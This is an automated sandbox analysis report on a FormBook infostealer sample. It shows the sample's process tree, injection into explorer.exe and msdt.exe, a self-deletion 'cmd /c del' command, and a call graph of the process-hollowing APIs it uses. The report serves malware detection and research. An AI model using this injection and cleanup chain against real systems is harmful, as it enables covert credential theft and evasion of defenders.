                                                                  Date: Mon, 27 Sep 2021 15:32:40 GMT
                                                                  Server: nginx/1.19.5
                                                                  Content-Type: text/html
                                                                  Content-Length: 583
                                                                  Last-Modified: Sat, 24 Jul 2021 10:05:02 GMT
                                                                  Accept-Ranges: bytes
                                                                  Vary: Accept-Encoding
                                                                  Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 2e 6c 6f 61 64 65 72 20 7b 20 62 6f 72 64 65 72 3a 20 31 36 70 78 20 73 6f 6c 69 64 20 23 66 33 66 33 66 33 3b 20 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 36 70 78 20 73 6f 6c 69 64 20 23 33 34 39 38 64 62 3b 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 35 30 25 3b 20 77 69 64 74 68 3a 20 31 32 30 70 78 3b 20 68 65 69 67 68 74 3a 20 31 32 30 70 78 3b 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 73 70 69 6e 20 32 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 3b 20 70 6f 73 69 74 69 6f 6e 3a 20 66 69 78 65 64 3b 20 74 6f 70 3a 20 34 30 25 3b 20 6c 65 66 74 3a 20 34 30 25 3b 20 7d 0a 20 20 20 20 20 20 20 20 40 6b 65 79 66 72 61 6d 65 73 20 73 70 69 6e 20 7b 20 30 25 20 7b 20 74 72 61 6e 73 66 6f 72 6d 3a 20 72 6f 74 61 74 65 28 30 64 65 67 29 3b 20 7d 20 31 30 30 25 20 7b 20 74 72 61 6e 73 66 6f 72 6d 3a 20 72 6f 74 61 74 65 28 33 36 30 64 65 67 29 3b 20 7d 20 7d 0a 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 4a 61 76 61 73 63 72 69 70 74 22 3e 76 61 72 20 5f 73 6b 7a 5f 70 69 64 20 3d 20 22 39 50 4f 42 45 58 38 30 57 22 3b 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 4a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 63 64 6e 2e 6a 73 69 6e 69 74 2e 64 69 72 65 63 74 66 77 64 2e 63 6f 6d 2f 73 6b 2d 6a 73 70 61 72 6b 5f 69 6e 69 74 2e 70 68 70 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6c 6f 61 64 65 72 22 20 69 64 3d 22 73 6b 2d 6c 6f 61 64 65 72 22 3e 3c 2f 64 69 76 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                  Data Ascii: <html><head> <style> .loader { border: 16px solid #f3f3f3; border-top: 16px solid #3498db; border-radius: 50%; width: 120px; height: 120px; animation: spin 2s linear infinite; position: fixed; top: 40%; left: 40%; } @keyframes spin { 0% { transform: rotate(0deg); } 100% { transform: rotate(360deg); } } </style> <script language="Javascript">var _skz_pid = "9POBEX80W";</script> <script language="Javascript" src="http://cdn.jsinit.directfwd.com/sk-jspark_init.php"></script></head><body><div class="loader" id="sk-loader"></div></body></html>


                                                                  Code Manipulations

                                                                  Statistics

                                                                  CPU Usage

                                                                  Click to jump to process

                                                                  Memory Usage

                                                                  Click to jump to process

                                                                  High Level Behavior Distribution

                                                                  Click to dive into process behavior distribution

                                                                  Behavior

                                                                  Click to jump to process

                                                                  System Behavior

                                                                  Analysis Process: ejecutable1.exe PID: 788 Parent PID: 1528

                                                                  General

                                                                  Start time:17:31:14
                                                                  Start date:27/09/2021
                                                                  Path:C:\Users\user\Desktop\ejecutable1.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:'C:\Users\user\Desktop\ejecutable1.exe'
                                                                  Imagebase:0xf50000
                                                                  File size:840192 bytes
                                                                  MD5 hash:FF2724DDF0EF0525E9E419DB5199E96F
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:.Net C# or VB.NET
                                                                  Yara matches:
                                                                  • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.406398174.0000000002431000.00000004.00000001.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.407439949.0000000003431000.00000004.00000001.sdmp, Author: Joe Security
                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.407439949.0000000003431000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.407439949.0000000003431000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                  Reputation:low

                                                                  Chronological Activities

                                                                  Analysis Process: ejecutable1.exe PID: 2656 Parent PID: 788

                                                                  General

                                                                  Start time:17:31:18
                                                                  Start date:27/09/2021
                                                                  Path:C:\Users\user\Desktop\ejecutable1.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:C:\Users\user\Desktop\ejecutable1.exe
                                                                  Imagebase:0xf50000
                                                                  File size:840192 bytes
                                                                  MD5 hash:FF2724DDF0EF0525E9E419DB5199E96F
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Yara matches:
                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.442155573.0000000000080000.00000040.00020000.sdmp, Author: Joe Security
                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.442155573.0000000000080000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.442155573.0000000000080000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.442254980.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.442254980.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.442254980.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.442236058.0000000000360000.00000040.00020000.sdmp, Author: Joe Security
                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.442236058.0000000000360000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.442236058.0000000000360000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                  Reputation:low

                                                                  Chronological Activities

                                                                  Analysis Process: explorer.exe PID: 1764 Parent PID: 2656

                                                                  General

                                                                  Start time:17:31:19
                                                                  Start date:27/09/2021
                                                                  Path:C:\Windows\explorer.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\Explorer.EXE
                                                                  Imagebase:0xffa10000
                                                                  File size:3229696 bytes
                                                                  MD5 hash:38AE1B3C38FAEF56FE4907922F0385BA
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Yara matches:
                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000000.422839452.0000000007F73000.00000040.00020000.sdmp, Author: Joe Security
                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000000.422839452.0000000007F73000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000000.422839452.0000000007F73000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000000.433550854.0000000007F73000.00000040.00020000.sdmp, Author: Joe Security
                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000000.433550854.0000000007F73000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000000.433550854.0000000007F73000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                  Reputation:high

                                                                  Chronological Activities

                                                                  Analysis Process: msdt.exe PID: 2632 Parent PID: 1764

                                                                  General

                                                                  Start time:17:31:32
                                                                  Start date:27/09/2021
                                                                  Path:C:\Windows\SysWOW64\msdt.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:C:\Windows\SysWOW64\msdt.exe
                                                                  Imagebase:0xbe0000
                                                                  File size:983040 bytes
                                                                  MD5 hash:F67A64C46DE10425045AF682802F5BA6
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Yara matches:
                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.666143721.0000000000100000.00000040.00020000.sdmp, Author: Joe Security
                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.666143721.0000000000100000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.666143721.0000000000100000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.666244346.00000000002B0000.00000040.00020000.sdmp, Author: Joe Security
                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.666244346.00000000002B0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.666244346.00000000002B0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.666299275.00000000002E0000.00000004.00000001.sdmp, Author: Joe Security
                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.666299275.00000000002E0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.666299275.00000000002E0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                  Reputation:moderate

                                                                  Chronological Activities

                                                                  Analysis Process: cmd.exe PID: 1172 Parent PID: 2632

                                                                  General

                                                                  Start time:17:31:36
                                                                  Start date:27/09/2021
                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:/c del 'C:\Users\user\Desktop\ejecutable1.exe'
                                                                  Imagebase:0x4a890000
                                                                  File size:302592 bytes
                                                                  MD5 hash:AD7B9C14083B52BC532FBA5948342B98
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high

                                                                  Chronological Activities

                                                                  Disassembly

                                                                  Code Analysis

                                                                  Reset < >

                                                                    Analysis Process: ejecutable1.exe PID: 788 Parent PID: 1528 ejecutable1.exeCOMMON

                                                                    Execution Graph

                                                                    Execution Coverage:10.3%
                                                                    Dynamic/Decrypted Code Coverage:100%
                                                                    Signature Coverage:0%
                                                                    Total number of Nodes:95
                                                                    Total number of Limit Nodes:1

                                                                    Graph

                                                                    execution_graph 9789 da8aae 9793 da8bcc 9789->9793 9797 da8c58 9789->9797 9790 da8ac0 9794 da8c72 9793->9794 9801 da8ca8 9794->9801 9798 da8c72 9797->9798 9800 da8ca8 12 API calls 9798->9800 9799 da8ca0 9799->9790 9800->9799 9802 da8cd5 9801->9802 9805 da8ff8 9802->9805 9806 da9012 9805->9806 9816 da95ba 9806->9816 9823 da98c7 9806->9823 9828 da9880 9806->9828 9832 da914c 9806->9832 9836 da995e 9806->9836 9840 da9d19 9806->9840 9845 da977b 9806->9845 9849 da9abb 9806->9849 9807 da8ca0 9807->9790 9817 da95c4 9816->9817 9854 daa680 9817->9854 9818 da95f3 9819 da91b7 9818->9819 9859 daa458 9818->9859 9864 daa468 9818->9864 9819->9807 9824 da98cd 9823->9824 9825 da91b7 9824->9825 9885 da7b68 9824->9885 9889 da7b60 9824->9889 9825->9807 9893 daa610 9828->9893 9898 daa600 9828->9898 9829 da9898 9911 da7fe8 9832->9911 9916 da7ff0 9832->9916 9838 da7b68 WriteProcessMemory 9836->9838 9839 da7b60 WriteProcessMemory 9836->9839 9837 da91b7 9838->9837 9839->9837 9841 da9d28 9840->9841 9842 da91b7 9841->9842 9843 da7b68 WriteProcessMemory 9841->9843 9844 da7b60 WriteProcessMemory 9841->9844 9842->9807 9843->9842 9844->9842 9920 da7d18 9845->9920 9924 da7d14 9845->9924 9846 da933a 9846->9807 9850 da9ac1 9849->9850 9851 da91b7 9850->9851 9852 da7b68 WriteProcessMemory 9850->9852 9853 da7b60 WriteProcessMemory 9850->9853 9852->9851 9853->9851 9855 daa69a 9854->9855 9869 da763b 9855->9869 9873 da7640 9855->9873 9856 daa6c9 9856->9818 9860 daa482 9859->9860 9877 da79eb 9860->9877 9881 da79f0 9860->9881 9861 daa4bd 9861->9819 9865 daa482 9864->9865 9867 da79eb VirtualAllocEx 9865->9867 9868 da79f0 VirtualAllocEx 9865->9868 9866 daa4bd 9866->9819 9867->9866 9868->9866 9870 da7684 ResumeThread 9869->9870 9872 da76d6 9870->9872 9872->9856 9874 da7684 ResumeThread 9873->9874 9876 da76d6 9874->9876 9876->9856 9878 da79f0 VirtualAllocEx 9877->9878 9880 da7a9f 9878->9880 9880->9861 9882 da7a34 VirtualAllocEx 9881->9882 9884 da7a9f 9882->9884 9884->9861 9886 da7bb4 WriteProcessMemory 9885->9886 9888 da7c53 9886->9888 9888->9825 9890 da7bb4 WriteProcessMemory 9889->9890 9892 da7c53 9890->9892 9892->9825 9894 daa62a 9893->9894 9903 da7778 9894->9903 9907 da7780 9894->9907 9895 daa65c 9895->9829 9899 daa62a 9898->9899 9901 da7778 Wow64SetThreadContext 9899->9901 9902 da7780 Wow64SetThreadContext 9899->9902 9900 daa65c 9900->9829 9901->9900 9902->9900 9904 da77c9 Wow64SetThreadContext 9903->9904 9906 da7847 9904->9906 9906->9895 9908 da77c9 Wow64SetThreadContext 9907->9908 9910 da7847 9908->9910 9910->9895 9912 da7f77 9911->9912 9913 da7feb CreateProcessA 9911->9913 9915 da82d5 9913->9915 9917 da8077 CreateProcessA 9916->9917 9919 da82d5 9917->9919 9919->9919 9921 da7d64 ReadProcessMemory 9920->9921 9923 da7de2 9921->9923 9923->9846 9925 da7d18 ReadProcessMemory 9924->9925 9927 da7de2 9925->9927 9927->9846

                                                                    Executed Functions

                                                                    Function 002700F0, Relevance: 4.9, Instructions: 4912COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 135 2700f0-270553 138 270555 135->138 139 27055a-270896 call 275a5a call 2703d8 call 2703e8 135->139 138->139 197 27089b-272a2a call 2703f8 call 270408 call 270418 call 270428 139->197 530 272a54 197->530 531 272a2c-272a38 197->531 534 272a5a-272b61 530->534 532 272a42-272a48 531->532 533 272a3a-272a40 531->533 535 272a52 532->535 533->535 544 272b63-272b6f 534->544 545 272b8b 534->545 535->534 546 272b71-272b77 544->546 547 272b79-272b7f 544->547 548 272b91-272c98 545->548 549 272b89 546->549 547->549 558 272cc2 548->558 559 272c9a-272ca6 548->559 549->548 562 272cc8-272dcf 558->562 560 272cb0-272cb6 559->560 561 272ca8-272cae 559->561 563 272cc0 560->563 561->563 572 272dd1-272ddd 562->572 573 272df9 562->573 563->562 575 272de7-272ded 572->575 576 272ddf-272de5 572->576 574 272dff-272f06 573->574 586 272f30 574->586 587 272f08-272f14 574->587 577 272df7 575->577 576->577 577->574 590 272f36-27303d 586->590 588 272f16-272f1c 587->588 589 272f1e-272f24 587->589 591 272f2e 588->591 589->591 600 273067 590->600 601 27303f-27304b 590->601 591->590 602 27306d-273174 600->602 603 273055-27305b 601->603 604 27304d-273053 601->604 614 273176-273182 602->614 615 27319e 602->615 605 273065 603->605 604->605 605->602 616 273184-27318a 614->616 617 27318c-273192 614->617 618 2731a4-2758c9 615->618 619 27319c 616->619 617->619 954 2758f3 618->954 955 2758cb-2758d7 618->955 619->618 958 2758f9-275a4d 954->958 956 2758e1-2758e7 955->956 957 2758d9-2758df 955->957 959 2758f1 956->959 957->959 959->958
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.405827262.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_270000_ejecutable1.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 26df6e99cf423451d369bee253383786f3ba87ff98cbd11c8f7233e367f0ecec
                                                                    • Instruction ID: 72f117f00034fc707f6a0afc7ce3a0b770329f067f6069ea5da24bc73ca9f779
                                                                    • Opcode Fuzzy Hash: 26df6e99cf423451d369bee253383786f3ba87ff98cbd11c8f7233e367f0ecec
                                                                    • Instruction Fuzzy Hash: 87C3B374A112598FC724DB64C894ED9B3B2FF8A304F5186E9D809AB361DB71AEC1CF41
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00DA67E7, Relevance: .3, Instructions: 272COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.406205874.0000000000DA0000.00000040.00000001.sdmp, Offset: 00DA0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_da0000_ejecutable1.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 7e5ed4659a442b46664156ade60e80f186e65c7ee15aa66651017a8cc3fc43eb
                                                                    • Instruction ID: c1f6914d61266db7d993220074d498c3dac52ea8684b3ab0ab1f26cd54aecff8
                                                                    • Opcode Fuzzy Hash: 7e5ed4659a442b46664156ade60e80f186e65c7ee15aa66651017a8cc3fc43eb
                                                                    • Instruction Fuzzy Hash: E1B10574E00209CFDB00CFA9C9446AEBBF6AF8A304F28C46AD459AB355E734D941CF65
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 002769C9, Relevance: .2, Instructions: 211COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.405827262.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_270000_ejecutable1.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 44d3754ce620d778c8f488761838f703b669f5694f0ca22a9ecb686025cf807d
                                                                    • Instruction ID: 141183aaa8085442b80fb1bd57b55053b453c27c2880d6623f59c3101c76aff5
                                                                    • Opcode Fuzzy Hash: 44d3754ce620d778c8f488761838f703b669f5694f0ca22a9ecb686025cf807d
                                                                    • Instruction Fuzzy Hash: 6291F1B4D10619CFDB25CFA5C8487AEBBB2FF89304F14C0AAD409A7241DB745A95DF50
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00276D30, Relevance: .2, Instructions: 192COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.405827262.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_270000_ejecutable1.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: fdd769311fd132266cb428251be4a5788e90cf58b8f655ab5fd3967f1f37a735
                                                                    • Instruction ID: d40382cb55c8eb7fe84d5b22032f525d9770b43a485b491eb541500ca545f842
                                                                    • Opcode Fuzzy Hash: fdd769311fd132266cb428251be4a5788e90cf58b8f655ab5fd3967f1f37a735
                                                                    • Instruction Fuzzy Hash: 9871E2B4E206198FCB04CFA9D488AAEFBF2BF49300F24C52AD419AB245D7749995CF51
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00DA7FE8, Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 337processCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 0 da7fe8-da7fe9 1 da7feb-da8089 0->1 2 da7f77-da7f8c 0->2 5 da808b-da80a2 1->5 6 da80d2-da80fa 1->6 5->6 9 da80a4-da80a9 5->9 10 da80fc-da8110 6->10 11 da8140-da8196 6->11 12 da80ab-da80b5 9->12 13 da80cc-da80cf 9->13 10->11 18 da8112-da8117 10->18 20 da8198-da81ac 11->20 21 da81dc-da82d3 CreateProcessA 11->21 14 da80b9-da80c8 12->14 15 da80b7 12->15 13->6 14->14 19 da80ca 14->19 15->14 22 da813a-da813d 18->22 23 da8119-da8123 18->23 19->13 20->21 29 da81ae-da81b3 20->29 39 da82dc-da83a1 21->39 40 da82d5-da82db 21->40 22->11 24 da8127-da8136 23->24 25 da8125 23->25 24->24 28 da8138 24->28 25->24 28->22 31 da81d6-da81d9 29->31 32 da81b5-da81bf 29->32 31->21 33 da81c3-da81d2 32->33 34 da81c1 32->34 33->33 35 da81d4 33->35 34->33 35->31 51 da83bd-da83be 39->51 40->39 52 da8398-da83a1 51->52 53 da83c0-da83c1 51->53 52->51 54 da83c3-da83c7 53->54 55 da83d1-da83d5 53->55 54->55 56 da83c9 54->56 57 da83d7-da83db 55->57 58 da83e5-da83e9 55->58 56->55 57->58 59 da83dd 57->59 60 da83eb-da83ef 58->60 61 da83f9-da83fd 58->61 59->58 60->61 62 da83f1 60->62 63 da83ff-da8428 61->63 64 da8433-da843e 61->64 62->61 63->64 68 da843f 64->68 68->68
                                                                    APIs
                                                                    • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00DA82B7
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.406205874.0000000000DA0000.00000040.00000001.sdmp, Offset: 00DA0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_da0000_ejecutable1.jbxd
                                                                    Similarity
                                                                    • API ID: CreateProcess
                                                                    • String ID: <mw$<mw$<mw
                                                                    • API String ID: 963392458-139993042
                                                                    • Opcode ID: b968376d9550deed03627bd3a32709ab3d9c189aece3d193c48898f757327972
                                                                    • Instruction ID: 1716face248840ae2aa45dd15dc02309780e4cea1a75920f087e48485c514a96
                                                                    • Opcode Fuzzy Hash: b968376d9550deed03627bd3a32709ab3d9c189aece3d193c48898f757327972
                                                                    • Instruction Fuzzy Hash: BED1F271D002198FDF20CFA4C841BEEBBB1BB4A304F1495AAD859A7240DB749A85DF95
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00DA7FF0, Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 323processCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 69 da7ff0-da8089 71 da808b-da80a2 69->71 72 da80d2-da80fa 69->72 71->72 75 da80a4-da80a9 71->75 76 da80fc-da8110 72->76 77 da8140-da8196 72->77 78 da80ab-da80b5 75->78 79 da80cc-da80cf 75->79 76->77 84 da8112-da8117 76->84 86 da8198-da81ac 77->86 87 da81dc-da82d3 CreateProcessA 77->87 80 da80b9-da80c8 78->80 81 da80b7 78->81 79->72 80->80 85 da80ca 80->85 81->80 88 da813a-da813d 84->88 89 da8119-da8123 84->89 85->79 86->87 95 da81ae-da81b3 86->95 105 da82dc-da83a1 87->105 106 da82d5-da82db 87->106 88->77 90 da8127-da8136 89->90 91 da8125 89->91 90->90 94 da8138 90->94 91->90 94->88 97 da81d6-da81d9 95->97 98 da81b5-da81bf 95->98 97->87 99 da81c3-da81d2 98->99 100 da81c1 98->100 99->99 101 da81d4 99->101 100->99 101->97 117 da83bd-da83be 105->117 106->105 118 da8398-da83a1 117->118 119 da83c0-da83c1 117->119 118->117 120 da83c3-da83c7 119->120 121 da83d1-da83d5 119->121 120->121 122 da83c9 120->122 123 da83d7-da83db 121->123 124 da83e5-da83e9 121->124 122->121 123->124 125 da83dd 123->125 126 da83eb-da83ef 124->126 127 da83f9-da83fd 124->127 125->124 126->127 128 da83f1 126->128 129 da83ff-da8428 127->129 130 da8433-da843e 127->130 128->127 129->130 134 da843f 130->134 134->134
                                                                    APIs
                                                                    • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00DA82B7
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.406205874.0000000000DA0000.00000040.00000001.sdmp, Offset: 00DA0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_da0000_ejecutable1.jbxd
                                                                    Similarity
                                                                    • API ID: CreateProcess
                                                                    • String ID: <mw$<mw$<mw
                                                                    • API String ID: 963392458-139993042
                                                                    • Opcode ID: c49e183c08e7b009963c3dc85510edb9b5c06896de5dc6fc25ce822c1878e5ef
                                                                    • Instruction ID: 09e9c0cdd011e45e92f700b8a42fc0140d56bfd38bec8e51c1025720148a2cdb
                                                                    • Opcode Fuzzy Hash: c49e183c08e7b009963c3dc85510edb9b5c06896de5dc6fc25ce822c1878e5ef
                                                                    • Instruction Fuzzy Hash: 0DC10371D0022D8FDF20CFA4C841BEEBBB1BB4A304F1495A9D849B7280DB749A85DF95
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0027F750, Relevance: 2.6, Strings: 2, Instructions: 78COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 1067 27f750-27f771 1068 27f773 1067->1068 1069 27f778-27f783 1067->1069 1068->1069 1070 27f798-27f79c 1069->1070 1071 27f785-27f791 1070->1071 1072 27f79e-27f7a5 1070->1072 1071->1070 1073 27f793 1071->1073 1074 27f7a7 1072->1074 1075 27f7ad-27f7c6 1072->1075 1073->1070 1091 27f7a7 call da3e2a 1074->1091 1092 27f7a7 call da2843 1074->1092 1093 27f7a7 call da3003 1074->1093 1094 27f7a7 call da0ec3 1074->1094 1077 27f827-27f833 1075->1077 1078 27f835-27f83a 1077->1078 1079 27f7c8-27f7d4 1077->1079 1080 27f7d6 1079->1080 1081 27f7db-27f7ee 1079->1081 1080->1081 1083 27f824 1081->1083 1084 27f7f0-27f7fc 1081->1084 1083->1077 1085 27f7fe-27f807 1084->1085 1086 27f81d 1084->1086 1087 27f80e-27f811 1085->1087 1088 27f809-27f80c 1085->1088 1089 27f820-27f823 1086->1089 1090 27f81b 1087->1090 1088->1090 1090->1089 1091->1075 1092->1075 1093->1075 1094->1075
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.405827262.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_270000_ejecutable1.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: `!@m$`!@m
                                                                    • API String ID: 0-2319818447
                                                                    • Opcode ID: b0c25da21070384a0f8ba09b3e148b3ded7fd335644ea9bb53d91a25966ac9c8
                                                                    • Instruction ID: 343f6b08297068b347a696b4b4ece59703b63dc9a0f070005aeec353e494a7da
                                                                    • Opcode Fuzzy Hash: b0c25da21070384a0f8ba09b3e148b3ded7fd335644ea9bb53d91a25966ac9c8
                                                                    • Instruction Fuzzy Hash: A2312770D1820ACFDB98DFA9D9856AEFBF1BF88300F10C16AD809A7644D7349990CF91
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00DA7B60, Relevance: 1.6, APIs: 1, Instructions: 120injectionCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 1125 da7b60-da7bd3 1127 da7bea-da7c51 WriteProcessMemory 1125->1127 1128 da7bd5-da7be7 1125->1128 1130 da7c5a-da7cac 1127->1130 1131 da7c53-da7c59 1127->1131 1128->1127 1131->1130
                                                                    APIs
                                                                    • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 00DA7C3B
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.406205874.0000000000DA0000.00000040.00000001.sdmp, Offset: 00DA0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_da0000_ejecutable1.jbxd
                                                                    Similarity
                                                                    • API ID: MemoryProcessWrite
                                                                    • String ID:
                                                                    • API String ID: 3559483778-0
